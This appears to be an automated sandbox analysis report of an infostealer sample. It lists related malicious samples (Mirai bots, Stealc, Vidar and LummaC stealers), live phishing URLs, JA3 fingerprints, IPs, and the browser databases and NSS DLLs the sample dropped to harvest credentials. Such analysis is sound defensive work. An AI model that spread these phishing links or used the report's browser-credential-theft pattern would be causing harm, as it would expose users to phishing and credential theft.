MICROSOFT-CORP-MSN-AS-BLOCKUS	https://docs.google.com/drawings/d/1rnJTD83ySW2kuilnF4J1ffAp0B5BM7BM0Nvi8F8BbSI/preview?pli=1HeatherMitchell-andrew.tokar@overlakehospital.org	Get hash	malicious	HTMLPhisher	Browse	52.98.61.50
	fbot.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	13.107.240.53
	fbot.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	13.80.175.232
	fbot.mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	135.149.96.50
	fbot.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	20.130.139.165
	fbot.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	40.83.40.144
	https://avidgroup.famislnc.com/fvcvfxfec/cc6d843dfd/?1f9da=amtsZW1wQGNhcmlzbHMuY29t	Get hash	malicious	Unknown	Browse	13.107.246.63
	Customer forms.pdf	Get hash	malicious	Unknown	Browse	20.75.106.146
	http://www.thecrownstate.co.uk/	Get hash	malicious	Unknown	Browse	13.107.246.63
	https://myworkspaceb7705.myclickfunnels.com/ville-de-rouyn-noranda	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	13.107.246.63
MIT-GATEWAYSUS	fbot.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	19.244.187.11
	fbot.ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	19.218.96.169
	fbot.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	19.251.105.174
	fbot.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	18.92.224.186
	Invoice-99007553423-protected.pdf	Get hash	malicious	Unknown	Browse	18.173.205.79
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.164.116.57
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	19.5.240.43
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	19.111.220.99
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	18.54.45.190
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	19.89.141.231

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/	Get hash	malicious	Unknown	Browse	4.245.163.56 20.190.177.146 13.107.246.63 23.218.208.109
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse	4.245.163.56 20.190.177.146 13.107.246.63 23.218.208.109
	https://kkinternational.co.uk/	Get hash	malicious	HTMLPhisher	Browse	4.245.163.56 20.190.177.146 13.107.246.63 23.218.208.109
	https://zxptech.com	Get hash	malicious	Unknown	Browse	4.245.163.56 20.190.177.146 13.107.246.63 23.218.208.109
	https://shorturl.at/ZbKEL?REVd=Vhx6ZLBnjMm	Get hash	malicious	Unknown	Browse	4.245.163.56 20.190.177.146 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, Vidar	Browse	4.245.163.56 20.190.177.146 13.107.246.63 23.218.208.109
	https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/random.bby/inpoxqhfiww/gmail.com/ozwunijponqp8	Get hash	malicious	Unknown	Browse	4.245.163.56 20.190.177.146 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	4.245.163.56 20.190.177.146 13.107.246.63 23.218.208.109
	Fumari INC.eml	Get hash	malicious	Unknown	Browse	4.245.163.56 20.190.177.146 13.107.246.63 23.218.208.109
	https://invites-doc.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	4.245.163.56 20.190.177.146 13.107.246.63 23.218.208.109
6271f898ce5be7dd52b0fc260d0662b3	https://www.e-serviceparts.info/landingpages/cce21bb4-48dd-49da-9e48-d89a21f56454/RtynoRElk6VQIiohoauuXaUdv9Gb4EPJBf3UQg9_Um4	Get hash	malicious	HTMLPhisher	Browse	150.171.27.10 20.199.58.43 2.16.158.83 20.223.35.26
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	150.171.27.10 20.199.58.43 2.16.158.83 20.223.35.26
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 20.199.58.43 2.16.158.83 20.223.35.26
	P0-4856383648383364838364836483.xls	Get hash	malicious	Unknown	Browse	150.171.27.10 20.199.58.43 2.16.158.83 20.223.35.26
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 20.199.58.43 2.16.158.83 20.223.35.26
	file.exe	Get hash	malicious	LummaC Stealer	Browse	150.171.27.10 20.199.58.43 2.16.158.83 20.223.35.26
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 20.199.58.43 2.16.158.83 20.223.35.26
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 20.199.58.43 2.16.158.83 20.223.35.26
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 20.199.58.43 2.16.158.83 20.223.35.26
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 20.199.58.43 2.16.158.83 20.223.35.26
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	FormBook	Browse	20.198.119.143 20.198.118.190
	file.exe	Get hash	malicious	FormBook	Browse	20.198.119.143 20.198.118.190
	Orden de compra HO-PO-376-25.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	20.198.119.143 20.198.118.190
	file.exe	Get hash	malicious	Cryptbot	Browse	20.198.119.143 20.198.118.190
	INV-0542.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	20.198.119.143 20.198.118.190
	Evidence of copyright infringement (2).bat	Get hash	malicious	Unknown	Browse	20.198.119.143 20.198.118.190
	Evidence of copyright infringement.bat	Get hash	malicious	Unknown	Browse	20.198.119.143 20.198.118.190
	Compilation of videos and images protected by copyright.bat	Get hash	malicious	Unknown	Browse	20.198.119.143 20.198.118.190
	Verzameling van video's en afbeeldingen die beschermd zijn door auteursrecht (2).bat	Get hash	malicious	Unknown	Browse	20.198.119.143 20.198.118.190
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.198.119.143 20.198.118.190

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BGCAFHCAKFBFIECAFIIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIDHCAAKECGCBFIJDBAAFBGH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBFBFBFIIJDAKECAKKJEHCFIJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EHJKFCGHIDHCBGDHJKEB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\FHDAFIID

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHJDGDBF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.267727947473452
Encrypted:	false
SSDEEP:	384:L/2qOB1nxCkM3SA1LyKOMq+8iP5GDHP/0jMVumX:Kq+n0J391LyKOMq+8iP5GLP/0W
MD5:	4DC56E98D1E337BC6CA8FADB1130C23B
SHA1:	32219DA3E2E4498FE2CFF6DD18191CE780627A3E
SHA-256:	31BABCDC410FF60B8522BF78906E1F511BD2202B16DFF1E7FCAB475630C53BFE
SHA-512:	C51DEC267E6EE6D29ABF0C6BF0E83DC2FFDC1609E24926473C8DB0C75B48AA5FA5A985C2399EE5671429053712303EFD14B39D361C07365D924BDAB831FFC643
Malicious:	false
Preview:	SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IECBAFCAAKJDHJKFIEBG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: IeccNv7PP6.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0f2e140b-806f-4973-a63c-1a7efdebd18b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44910
Entropy (8bit):	6.09521904288435
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWzdi1zNtea29yNusPqiaEKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynY6DKtSmd6qE7lFoC
MD5:	8EB4975EA9696532D5F4B19F49C49968
SHA1:	5249923BF98619670D89BFAE14BFCAA355D1D415
SHA-256:	0FBCE0465CD2EA22B3E5E9893F1DA879CCC725264119C41E3C6B888E734A5D2C
SHA-512:	FF16DC56C328A176359DD8222328474E68C90B427B6D7784383CDB79F9B71F42E3B78111CE9AF20901C3EA1D58407A9CB540DDBCE99EDCE0573AFC5B35A40DCD
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\105d80ec-23d9-4ddb-a5cd-6f97ec4ff421.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44910
Entropy (8bit):	6.09521904288435
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWzdi1zNtea29yNusPqiaEKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynY6DKtSmd6qE7lFoC
MD5:	8EB4975EA9696532D5F4B19F49C49968
SHA1:	5249923BF98619670D89BFAE14BFCAA355D1D415
SHA-256:	0FBCE0465CD2EA22B3E5E9893F1DA879CCC725264119C41E3C6B888E734A5D2C
SHA-512:	FF16DC56C328A176359DD8222328474E68C90B427B6D7784383CDB79F9B71F42E3B78111CE9AF20901C3EA1D58407A9CB540DDBCE99EDCE0573AFC5B35A40DCD
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\31c7ee0c-3c2f-46c2-b6e2-25a34bd5d74e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	46507
Entropy (8bit):	6.086923932826702
Encrypted:	false
SSDEEP:	768:MMkbJrT8IeQc5W9PzAi1zNtea29rVSMC421IQmxgpCio9JDSgzMMd6qD47u30H:MMk1rT8H+922IQ9Fo9tSmd6qE7p
